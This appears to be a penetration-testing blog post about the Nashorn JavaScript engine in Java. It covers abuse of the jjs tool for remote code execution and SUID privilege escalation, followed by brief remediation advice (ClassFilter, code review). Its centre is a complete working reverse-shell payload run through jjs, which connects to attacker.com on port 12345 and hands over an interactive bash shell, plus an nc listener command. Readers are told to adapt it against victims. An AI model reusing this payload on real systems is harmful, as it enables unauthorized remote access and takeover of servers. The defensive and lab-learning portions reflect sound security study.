JAVA…JAVASCRIPT.
Even though they are completely different languages one for server-side development and the other for client-side. How grateful would it be if java code executes inside javascript and vice-versa? Of course, the results would be awesome!!! Let’s get straight into the concept now. Have you heard of Nashorn ??
Nashorn is the high-performance JavaScript engine developed in Java. It allows the developer to execute JavaScript in Java and vice versa. After Java SE 7, Nashorn has become the official JavaScript engine and all JDKs are shipped with it. It provides 2 to 10 times better performance, as it directly compiles the code in memory and passes the bytecode to JVM.
Why Nashorn?
When we say Nashorn helps to execute JavaScript code in Java and vice versa, the first question which comes to mind is “Isn't it a security concern to execute JavaScript code in Java?” and the list of vulnerabilities pops up in mind. A few of the reasons why this might be required are Customization The end-user can modify the code without recompiling the whole Java application and Code reusability Developers can leverage the code for input validation on the client-side and it can be reused on the server-side because the business logic remains the same.
To interact with Nashorn JavaScript Engine, JDK comes with 2 command-line tools Java Java Script (jjs) and jrunscript. Let’s take jjs into consideration for now.
Java Java Script (jjs) is the recommended client for interacting with Nashorn. We can write a JavaScript code, embed the Java snippets in it, and execute the javascript file using jjs. Similarly, we can write a Java code and embed the JavaScript snippets. Development Apart, Let’s move into the security aspect of it.
To-Do Checks
Suppose in the web application, there is a feature where the application accepts the javascript code/file from the users and the server-side allows the javascript files to perform few operations. If you ever see any such functionality, jump in to find out this vulnerability.
Provide javascript code to the application, so that we can perform remote code execution on the server.
Sample Code:
During PenTest, When you find any interesting SUID file with /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs (upon running LinEnum or any other script for escalating privileges) then here’s the quick exploit which will allow you to get root access through privilege escalation. So, follow GTFobins — JJS Exploit.
The POC script is shown below:
Reverse Shell:
It can send back a reverse shell to a listening attacker to open remote network access.
- Run
nc -nvlp 12345on the attacker, box to receive the shell.
export RHOST=attacker.com
export RPORT=12345
echo 'var host=Java.type("java.lang.System").getenv("RHOST");
var port=Java.type("java.lang.System").getenv("RPORT");
var ProcessBuilder = Java.type("java.lang.ProcessBuilder");
var p=new ProcessBuilder("/bin/bash", "-i").redirectErrorStream(true).start();
var Socket = Java.type("java.net.Socket");
var s=new Socket(host,port);
var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type("java.lang.Thread").sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();' | jjsTadah!! we’ll be into the machine.
Remediations:
For Developers:
We can mitigate this vulnerability by implementing ClassFilter interface. This interface contains a method exposeToScripts. By overriding this method, we can prevent dangerous methods from being called via reflection API.
The finest way to find this vulnerability is through manual code review. Try grepping the source code for the keywords like nashorn, javax.script. In case the application is using Nashorn Script Engine, review the source code to confirm if the ClassFilter is implemented.
If you are doing pentest, look for the functionality which accepts javascript as an input. Modify the exploit payload mentioned earlier to perform remote code execution or get the reverse shell back from the victim.
Try out HTB Mango Box for this kind of privilege escalation.
Happy Learning guys!! Please feel free to suggest if any:)
P.S
Code snippets are not my own!!
